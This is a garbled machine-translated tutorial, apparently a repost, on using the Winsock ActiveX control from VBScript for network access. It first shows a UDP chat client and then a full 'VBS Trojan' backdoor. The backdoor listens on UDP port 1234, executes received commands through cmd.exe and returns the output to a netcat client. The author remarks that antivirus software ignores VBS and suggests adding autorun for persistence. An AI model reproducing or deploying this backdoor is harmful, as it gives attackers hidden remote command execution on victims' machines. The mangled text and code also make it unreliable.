About a year ago, the VBS script virus uncovered a flurry of excitement, and a large group of VBS viruses flourished on the internet. At that time, almost all of the VBS virus with FSO, MAPI as a virus infection engine, so I think, VBS can access the network? If it can also be connected to the port, it's amazing. From then on, I tried to find information about the network of VBS, unfortunately for a long time, what harvest did not, until one months ago the college entrance examination is over, I can quiet down to do this thing, and finally made a little progress.
Now analyze how the VBS works. The full name of the VBS is "Visual Basic Scripts," because the VBS is an object-oriented scripting language separated by Visual Basic, so its syntax is similar to that of Visual Basic, and it also relies on object to implement its other advanced functions. Only the VBS is used Wscript.exe or Cscript.exe to explain, so it does not need to compile, directly run on the line, so this is also a VBS script to do hacking tools one of the special features: ordinary anti-virus software will not be interested in VBS. Because VBS is an object-oriented scripting language, many of Microsoft's ActiveX components can be created by "CreateObject" ("objectname") to create references, which may be Microsoft's program Interface! Perhaps using VB to write a network program friends also know that the use of VB to write a network program is roughly two: one is to invoke Windows API function, the second is the use of VB Winsock Control, that is, in the Windows system directory to see "Mswinsock.ocx." As the former API function is more complex, many friends like to use VB with the Winsock control, I do not know if you have noticed the Winsock control, in fact, it is the ActiveX component I said earlier, it provides a convenient way to access TCP and UDP network services, To write a client or server application, you do not have to know the details of TCP or invoke low-level Winsock APIs. You can easily connect to a remote machine by setting the properties of the control and calling its methods, and you can exchange data in both directions. Now that you've found the engine to access the network, how do you use it? Usage is not the same as VB and use it?
The Winsock control usage is generally the same as VB, but in the VBS, ActiveX controls are not as visible as in VB, and it is of course the object that is to be referenced on the VBS before it is created. Creating a method is like creating an FSO and so on. Creates a new text file in which to write:
--------------------------------------------------
Set sock=createobject ("Mswinsock.winsock")
Sock.aboutbox
--------------------------------------------------
Save As *.vbs to run it, you can see information about the Winsock controls registered in your system.
How can you? Be happy, don't worry, I'll talk about it in detail below. Since the object was created successfully, it is of course to use it like VB. The WINSCOK created in the VBS can not set parameters like the graphical interface in VB, it should be step to set up what protocol you are creating. The protocol to be set in the Winsock control is set by "Protocol", such as sock. Protocol=0 or sock. Protocol=1. Note When the value of "Protocol" is "0", the protocol being created is TCP, and the value is "1", then UDP is created.
Let me introduce you to the basic methods and events for Winsock control references:
Localhostname//Get Local host name
Localip//Get Local Host IP
SocketHandle//Get handle to create sock
RemotePort//Set or get remote port
LocalPort//Set or get local port
State//Returns the image status of the created sock (generations below) {
0 the default. Shut down
1 Open
2 Listening
3 Connection hangs
4 Identify the host
5 identified hosts
6 being connected
7 connected
8 siblings are shutting down the connection
9 Error}
Bytesreceived//Returns the number of data received (currently in the receive-side buffer)
Connect (remotehost,remoteport)/Establish remote connection, remotehost remote host Ip,remoteport remote host port
Listen//Make sock Listen
Senddata/getdata//Send or receive data
Close//Off to Image
Bind (LocalPort, localip)//bound to the port.
The basic things I finished, the following I test the remote main opportunity message (UDP), the following is a VBS file, you can try, the code is as follows (file Sock-udp.vbs):
----------------------------------------
Dim revdata
Dim sendata
Create a Winsock pair like
Set Sock=createobject ("Mswinsock.winsock")
Using the UDP protocol
Establish a connection
Sock. Protocol=1sock. Connect "127.0.0.1", 1234
Define the data to send
Sendata= "Hello!!!" &CHR (13)
Sending the data we want to send
Sock.senddata Sendata
Todo
If there's a data response, show it.
If sock. Bytesreceived>0 Then
Defines the receive data type (data type has vbbyte, Vbinteger, Vblong, Vbsingle
Vbdouble, Vbcurrency, Vbdate, Vbboolean, Vberror, vbstring, Vbarray+vbbyte)
Only the definition of a good data type to receive data, or you will receive a heap of garbled;
Sock.getdata revdata,vbstring;
Sendata=inputbox (Revdata, "Recvieddata", "Please enter the message you want to send")
Sock.senddata SendData & Chr (13)
End VBS process when received with "exit" string
If InStr (Revdata, "exit") then Exit Do
Else
End If
Loop
Close a pair of like sockets
Sock.close
------------------------------------------
Then use "Nc-u-l-p 1234" to monitor the local UDP port 1234, and then run the VBS file just written, look! My NC is responding.
The "MicroSoft (r) Windows Based Script Host" In it is our VBS master process. In the NC we can also send information, chat, how? A simple UDP C/s has been completed. Let me write a more about its use, since it can access the network, of course, it is to do a VBS Trojan! The old men will not oppose it! Haha, let ' s go!
--------------------------
Dim Revdata
Set Sock=createobject ("Mswinsock.winsock")
Set Sc=createobject ("Wscript.Shell")
Set FSO =createobject ("Scripting.FileSystemObject")
Sock. Protocol=1//This is of course the identity of the UDP protocol.
Sock.bind 1234//bind a local UDP port
Todo
If sock. Bytesreceived>0 Then
Sock.getdata revdata,vbstring
If InStr (Revdata, "exit") >0 Then
Exit Do
Else
On Error Resume Next
Tempfile= "C:\" & FSO. GetTempName
' Cmd=right (Revdata,len (Revdata)-4)
Cmd=left (Revdata,len (Revdata)-3)
Using the output of binding cmd
Call SC. Run ("cmd.exe/c" & cmd & ">" & tempfile,0,true)
Set TXF = fso. OpenTextFile (tempfile,1,false,0)
Read the output file into memory and send it to the client with SendData
Sock.senddata Txf.readall & vbCrLf & vbCrLf
Txf.close
Call FSO. DeleteFile (Tempfile,true)
End If
Xi hee, here is my copyright OH
Sock.senddata "--end--" & vbCrLf & "Forhelp exit:end|run:<runfilename>" & vbCrLf & "Maked by Attrib data:2004.7.28 "& vbCrLf & vbCrLf
End If
Loop
Sock.senddata "Connection closed!" & vbCrLf
Sock.close
Sock=nothings
-------------------
To this end, the basic structure of the code has been completed, to do an almighty Trojan can be added to the code, such as the Power-on automatic operation. Because the VBS program does not set up error protection, some of the wrong actions may occur, and interested friends can try it on their own. The use is to first run this VBS back door on the service side, then use your NC company, because the UDP protocol, NC command line is "Nc–u IP Port", remember to add the "-u" parameter ah, after the same as WinShell use on the line, the following is in my machine test screenshots.
As for TCP how to write, the truth is similar to UDP, I will not write more here, we can study under their own.
If there is any good method can also study with me. Thank you for watching.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.